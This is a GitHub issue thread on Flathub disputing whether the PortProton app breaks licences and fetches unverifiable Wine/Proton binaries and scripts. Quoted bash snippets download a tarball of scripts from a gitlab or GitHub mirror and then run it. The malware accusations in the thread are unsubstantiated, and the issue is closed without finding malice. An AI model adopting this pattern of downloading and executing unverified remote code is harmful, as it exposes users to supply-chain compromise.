License violation and suspicious app on Flathub #5195
Comments
tim77
changed the title
tim77
changed the title
|
The sources of the PortProton project can be found safely on Github https://github.com/Castro-Fidel/PortWINE custom versions of Proton and Wine with all patches here https://github.com/Castro-Fidel/wine_builds, so I consider the claim unfounded. |
|
The portproton file in flathub is not a binary, it's a regular bash script that will soon be in upstream, before accusing people at least bother to study the information. |
|
There even two different mirrors build scripts for Russians speaking and non-russians: # choose mirror
if [[ -z "$MIRROR" ]] \
&& [[ "$LANGUAGE" == "ru" ]]
then
echo 'export MIRROR="CDN"' >> "$USER_CONF"
export MIRROR="CDN"
elif [[ -z "$MIRROR" ]] ; then
echo 'export MIRROR="GITHUB"' >> "$USER_CONF"
export MIRROR="GITHUB"
fi |
CDN costs money and not small so it is used only by Russian users who have a problem with github, also the mirror can be easily changed, and how in general the topic jumped to CDN |
|
What exactly does this script download and from where and how can we be sure that it is legal and not malicious? |
|
What exactly does this script download and from where and how can we make sure that it is legal (allowed for redistribution) and not malicious. |
https://github.com/Castro-Fidel/PortWINE/releases Here is everything that is used in PortProton everything the same is on cdn.linux-gaming.ru |
|
If the fact that cdn is only used in a certain country because it is expensive to use cdn worldwide is enough to say that PortProton spreads viruses, then I have nothing to say. |
|
Absolutely everything that is in PortProton is 100% open except Steam Runtime Sniper, but it is not used in flatpak and in general is taken directly from Steam, so once again I repeat before accusing the project PortProton in something or provide evidence |
Exactly what i wrote in original post: it's a script which downloads binaries which no one can reproduce and even from different mirrors: |
Yeah, except proprietary blobs from your local PC which downloaded by your script published on Flathub. |
|
The link https://cdn.linux-gaming.ru/PROTON_LG_9-4.tar.xz downloads exactly the same file as from the git |
At least one proprietary component that you can't look into please |
Specifically this script only downloads the master branch from https://github.com/Castro-Fidel/PortWINE, about cdn already for the second time I repeat the separation is done to save money, but at the same time you can change the mirror with one button in the gui, I guess if the purpose was to infect the computer, then on git where you can see everything could not be switched |
|
Find a piece of code related to changing mirrors and make sure it's not just a stub |
I didn't like this part at all, why emphasize that the domain is .ru, although it is not hidden and is written literally in the id PortProton, do you have some kind of personal dislike specifically for Russians? |
Please tell me on what reality should i provide evidence, not you, as app developer, how your blobs downloaded by script published on Flathub anyone could reproduce? https://reproducible-builds.org/ And how long ago |
The Port Proton project is fully open as well as all its scripts custom versions of wine and proton are easily assembled using scripts from the wine_builds repository I don't see any proprietary blobs that you are talking about |
|
And as for the evidence you claim that PortProton is a proprietary product that should not be in flathub, I prove the opposite using links that will introduce all the sources and buildbot is it not normal for me to demand proof of your words, because at the moment you have not provided sufficient evidence that PortProton is a proprietary product |
|
In general, I do not see any point in continuing the dialogue without any real evidence of your accusations, as well as with possible bias on your part, I suggest waiting for an authorized person from flathub and only then continue |
echo -e "\nTry download scripts from gitlab.eterfund.ru..."
if ! curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
-L "https://gitlab.eterfund.ru/Castro-Fidel/PortWINE/-/archive/master/PortWINE-master.tar.gz" \
-o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
then
echo -e "\nError.\nTry download scripts from github.com..."
curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
-L "https://github.com/Castro-Fidel/PortWINE/archive/refs/heads/master.tar.gz" \
-o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
[ "$?" != "0" ] && fatal "Critical error during file download!"
fi
echo "Try unpacking scripts..."
tar -xvzf "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz" -C "${PORT_WINE_TMP_PATH}"The contents of this |
All scripts for building Proton in wine_builds there and links to sources, about git I do not understand, how can you change the master downloaded from git ? Scripts are not downloaded from cdn because they are small, so it is not possible to change anything in the process |
|
This app should be removed from Flathub entirely as soon as possible, this fact alone is enough: curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
-L "https://gitlab.eterfund.ru/Castro-Fidel/PortWINE/-/archive/master/PortWINE-master.tar.gz" \
-o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz" |
gutlab.eterfund.ru is just gitlab raised by etersoft, nothing can be changed there either |
|
On the link https://gitlab.eterfund.ru/Castro-Fidel/PortWINE is absolutely the same source code as on github, because it's just a mirror of guthub, just push occurs in two places at once, that's all, again for the reason I have repeatedly voiced github in cis countries works terrible |
|
I don't understand is it not normal practice to divide cercals by geo for the sake of economy ? What makes you think that if a project has three mirrors there are viruses ? |
|
How to change the master branch on the git so that it can not be traced in any way ? |
Build scripts here https://github.com/Castro-Fidel/wine_builds clone and build wine everything is reproducible, and don't mix PortProton and wine used in it into one mess, wine builds are not on gitlab. |
For the thousandth time I explain github in cis countries feels terrible, so in the wrapper that downloads all other scripts when running gitlab in priority, because complaints almost every day that PortProton is not downloaded disappeared only when switching to gitlab. |
Just 5 minutes ago you said exactly the opposite:
|
|
This is an installation script, and you say that wine does not reproduce wine just calmly builds, do not mix one with another |
|
You claimed that the versions of wine and proton used in PortProton are proprietary and cannot be built, which I pointed out four times that this is not true, now the build of wine and proton somehow included my words about the installation script, how is this related ? |
Please quote me when and where i claimed that. |
PortProton has no binary except for wine and proton, so the only thing that can not be reproduced is the assembly of wine and proton everything else is bare bash scripts that are not assembled and most importantly downloaded separately, not inside flatpak. |
|
For the millionth time I repeat in flathub there is only a wrapper that downloads scripts, there is nothing even assembled just this wrapper in /app/bin/ is copied and it in turn downloads scripts itself wrapper here https://github.com/flathub/ru.linux_gaming.PortProton/blob/master/portproton nothing illegal it does not do just downloads scripts and then runs setup from here https://github.com/Castro-Fidel/PortWINE/blob/master/data_from_portwine/scripts/setup.sh, that's the whole scheme. |
|
Should I specifically for flatpak not download from gitlab and get a bunch of problems what ? |
Seriously? Here is a full tree of wine blob provided by you: portproton-tree.txt Also i am not expert in Wine build but as far i know WINE itself in general impossible to made deterministic builds (yet). So maybe you can teach everyone else how you achieved this? Or what you will say if this will also turn out to be also untrue? It's easy to check. Everyone could check this if brave enough to run Also if your Wine builds reproducible, as you said, why you not builds it on Github with Actions or on Flathub infra which is even more correct? |
No, it downloads scripts not from here, but from here: echo -e "\nTry download scripts from gitlab.eterfund.ru..."
if ! curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
-L "https://gitlab.eterfund.ru/Castro-Fidel/PortWINE/-/archive/master/PortWINE-master.tar.gz" \
-o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"This is hilarious how you still trying to obfuscate this fact. The question is why? |
Right I'm trying so hard to hide this fact that all this can be found out by the script which is not encrypted at all on flathub, and gitlab.eterfund.ru itself is fully publicly available is really hilarious, don't you think that if I had a desire to hide something I would for example close the repository for viewing allowing only to download master.tar.gz from there and that's it, don't get involved in substitution of notions why gitlab is in priority I've written many times, there is no other reason |
And all of them are from wine and proton, open a regular proton and you'll get about the same list, so what does that tell you? |
Glorious Eggroll which builds Proton GE via Github Actions I take it has not achieved this either ? The only reason why we don't have autobuild is because it's not needed Github builds Proton two hours locally it takes 15 minutes to build it |
Run on a virtual machine or just look at the code that happens in these scripts, it's easy to accuse a person of something constantly finding stupid excuses, I gave you a link with all the tools and sources, if you are afraid to run them, then I have nothing to say, I do not hide anything |
|
functions_helper MD5: a2eec09bdb3da77d11705b62b0f4b472 start.sh MD5: a26a4f391c87981c461206b9bf144a43 setup.sh MD5: ce31dee5f1bd94ea17b00e5a17051423 var MD5: dbc876f9080e94c25352592dd88789d7 add_in_steam.sh MD5: f5a2fe3ba44f3b832f4beac2e44009f6 credits MD5: e3bb6905cba27cb0c9b2a1164cc50230 Here is a list of all the main script files and their md5 sums, you can do a git clone on github and gitlab and make sure that the sums of these files do not differ. |
You, as wine/proton "developer" ask me about this? 😆 You just said in an earlier message that your "scripts clone and build wine everything is reproducible" and now you saying that you take binary artifacts of Proton-GE. What's going on? Do you even understand what is reproducible build from sources? And how many times I will catch your false statements and attempts to strawmanning? You yourself don’t know and don’t understand what’s happening in your build process, confused in yours bash scripts? Which downloads another bash script which download another bash script from foo.ru source without any user prompt, without any checks during download process. Which downloads non-reproducible binary artifacts under not MIT license. And after that downloads binary files from your local machine! I dont see any of this License files and notices in your
and many, many more, see https://github.com/GloriousEggroll/proton-ge-custom/blob/master/dist.LICENSE GloriousEggroll provided full build process on his git project with all necessary license files. GloriousEggroll do not downloading during build process any new unverified tarbals with bunch of scripts WITHOUT ANY USER PROMT which contain everything and anything could be added into them on the fly WITHOUT ANY WAY to even notice the difference. All his changes in build process could be tracked and verified normally via regular git commit history. He provided full build process from sources from his github project. And he also provide build artifacts on trusted infra which built on Github. Not from his localhost. Do you even understand the difference? In what reality such app allowed to be published under MIT license which heavily depends on many other stuff licensed under non-MIT license? When non-reproducible binaries from user local machine which it is unknown how and by whom they were built when even their author himself does not understand how they are built are called open source and published under MIT license? I am not even talking about trusted, safe build, project here.
Wait, what? You just said that you not building it properly on trusted infra like github or flathub because it takes 2 hours to build? And that's a reason why you build it on your local machine, seriously? I've never heard such nonsense before. So we all who building software on trusted infra like provided by Linux distributions or Flathub or github all idiots maybe in your opinion? Especially big projects like Chromium the build process of which can take a day or more. And all this requirements and rules for packaging trusted and safe FOSS software not applies to you? Nowadays everyone can publish on Flathub bash script with |
At this point it's clearly you completely incompetent and ignorant or you doing this intentionally to hide the fact that your goal is to install malware on users machines. Here we go again. Me or anyone else don't needed your MD5 sums in such forum talks. What we all need is that all this checks was were in build process like everyone do. Fulfill all requirements for the build after which it can only be called trusted and safe. But you even do not tried to fix this. Instead your tried to convince us that downloading random unverified tarball with scripts and executable files every time on every launch of Anyone else would never even publish something like this publicly, such hello_world bash scripts kiddies. It's a shame. |
|
Facts:
|
FYI, it would be marked as |
No, it will not. But not for the reason you mentioned. This "app" will never be in other high quality, trusted sources, because any mainstream Linux distro doesn't allow such stuff for packaging in official repo. There is not
No respectable source would ever allow such things to be distributed and published. |
|
Please read what I've said. It was a general statement and not connected to this app. |
|
Any app with network access ( I agree that the custom wine and proton builds are better placed in the manifest instead of scripts in repo, but it's not possible to enforce that because wine and proton are too unstable and each apps/game require their own patches/version. There are also other applications like Steam and Bottles etc. doing similar things like downloading custom proton builds at runtime on user interaction. So we would need block them too and review every single code change/update of all apps to ensure they don't do something similar. This is not possible. Now about the licensing situation @Boria138:
We don't have the manpower or the legal expertise to determine what the final license should be when so many custom licenses are involved. But it is best to include the original license and to not modify the libraries in such cases.
@Boria138 Please document these in the readme here https://github.com/flathub/ru.linux_gaming.PortProton and how the tarball you are shipping is created. |
|
If there are any specific examples of Portporton shipping malicious libraries or binaries or just being malicious in general rather than what can be malicious please report them to [email protected] or open separate issues with specific examples. I'm closing the issue, since it veered off course too much with a heated debate and there is nothing I see needing action from us, right now. |
So I need to attach BSD 3 license (Proton) LGPL 2.1 (Wine) and MIT (PortProton) in /app/share/licence ? How do I do this correctly ? PortProton license is upstream, but where do I get the proton and wine license |
|
Those licenses should be in the tarball source or whatever you are using. For example any debs always include them. You can just move them to /app/share/licenses. And also please document the process to create the tarball in readme, can be a link. |
I added a Readme where I described where the archive came from, but I also made a PR in upstream where I added the ability to unpack the archive if it is in the path So, at the next update even those who are afraid that something happens to the tarball during the download can just download the master themselves and put it where they need it, I guess that takes care of the problem. |
App: ru.linux_gaming.PortProton
Where is actual build manifest of this WINE/Proton build? It's proprietary binary downloaded unclear where from and no one even know how it was built. How is this even published under MIT license? It's literally basically:
How this even passed the review?
The text was updated successfully, but these errors were encountered: